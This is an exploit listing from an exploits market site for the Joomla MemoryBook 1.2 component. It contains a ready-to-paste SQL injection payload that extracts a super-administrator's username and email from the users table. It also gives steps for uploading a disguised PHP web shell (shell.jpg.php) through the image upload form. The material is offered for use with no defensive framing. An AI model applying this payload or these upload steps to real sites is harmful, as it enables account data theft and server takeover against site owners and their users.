[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component MemoryBook 1.2 Multiple Vulnerabilities

Author
jdc
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10461
Category
web applications
Date add
27-12-2009
Platform
unsorted
========================================================
Joomla Component MemoryBook 1.2 Multiple Vulnerabilities
========================================================

SQL Injection
-------------
 
requires: magic quotes OFF, user account
 
Add this as the description of a new event:
 
'), ( 63,(SELECT CONCAT(username,0x20,email) FROM #__users WHERE gid=25
LIMIT 1),1,1,1) -- '
 
NOTE: 63 MUST be your Joomla user ID. extracted info can be found on
View Events page
 
 
Remote File Inclusion
---------------------
 
requires: user account
 
Just upload your PHP shell (shell.jpg.php) through the Add Image screen,
and find it's new URL in the View Images screen.



#  0day.today [2024-12-23]  #